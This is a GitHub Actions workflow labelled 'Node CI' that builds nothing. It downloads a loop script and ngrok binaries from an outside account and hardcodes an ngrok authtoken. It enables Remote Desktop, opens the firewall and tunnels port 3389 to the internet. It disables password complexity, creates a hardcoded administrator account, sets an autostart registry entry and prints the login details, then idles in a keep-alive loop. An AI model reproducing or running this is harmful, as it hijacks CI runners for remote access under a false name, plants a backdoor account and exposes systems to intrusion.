
name: Node CI

on:
  pull_request:
  workflow_dispatch:

jobs:
  build:
    strategy:
      fail-fast: false
      matrix:
        os: [windows-latest]
        node: ['16']
        include:
        - os: windows-latest
          commandPrefix: ''
    runs-on: ${{ matrix.os }}
    steps:
    - name: Import
      run: |
        Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/loop.ps1 -OutFile loop.ps1
        Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/ngrok.zip -OutFile ngrok.zip
        Invoke-WebRequest https://raw.githubusercontent.com/FleterA1/FleterA1/main/resources/ngrok.exe -OutFile ngrok.exe
        Expand-Archive ngrok.zip
        .\ngrok\ngrok.exe config add-authtoken 1jlQ3vQwtRHGQaZ4lkIhaslLt31_5knGeAyKG3dvVJbt7nuRr
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
        Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
        Start-Process Powershell -ArgumentList '-Noexit -Command ".\ngrok\ngrok.exe tcp 3389 --region ap"'
        copy ngrok.exe C:\Windows\ngrok.exe


    - name: host
      run: |
        cmd /c @echo off
        cmd /c secedit /export /cfg c:\secpol.cfg
        cmd /c (gc C:\secpol.cfg).replace("PasswordComplexity = 1", "PasswordComplexity = 0") | Out-File C:\secpol.cfg
        cmd /c secedit /configure /db c:\windows\security\local.sdb /cfg c:\secpol.cfg /areas SECURITYPOLICY
        cmd /c rm -force c:\secpol.cfg -confirm:$false
        cmd /c net config server /srvcomment:"Fleter.." > out.txt 2>&1
        cmd /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /V EnableAutoTray /T REG_DWORD /D 0 /F > out.txt 2>&1
        cmd /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /f /v Wallpaper /t REG_SZ /d D:\a\wallpaper.bat
        cmd /c net user Fleter Admin@ys?0235 /add >nul
        cmd /c net localgroup administrators Fleter /add >nul
        cmd /c net user Fleter /active:yes >nul
        cmd /c net user installer /delete >nul
        cmd /c diskperf -Y >nul
        cmd /c sc config Audiosrv start= auto >nul
        cmd /c sc start audiosrv >nul
        cmd /c ICACLS C:\Windows\Temp /grant Fleter:F >nul
        cmd /c ICACLS C:\Windows\installer /grant Fleter:F >nul
        cmd /c echo Successfully installed!
        cmd /c echo IP:
        cmd /c tasklist | find /i "ngrok.exe" >Nul && curl -s localhost:4040/api/tunnels | jq -r .tunnels[0].public_url || echo "Failed to retreive NGROK authtoken - check again your authtoken"
        cmd /c echo Username: Fleter
        cmd /c echo Password: Admin@ys?0235


    - name: AFK
      run: |
        ./loop.ps1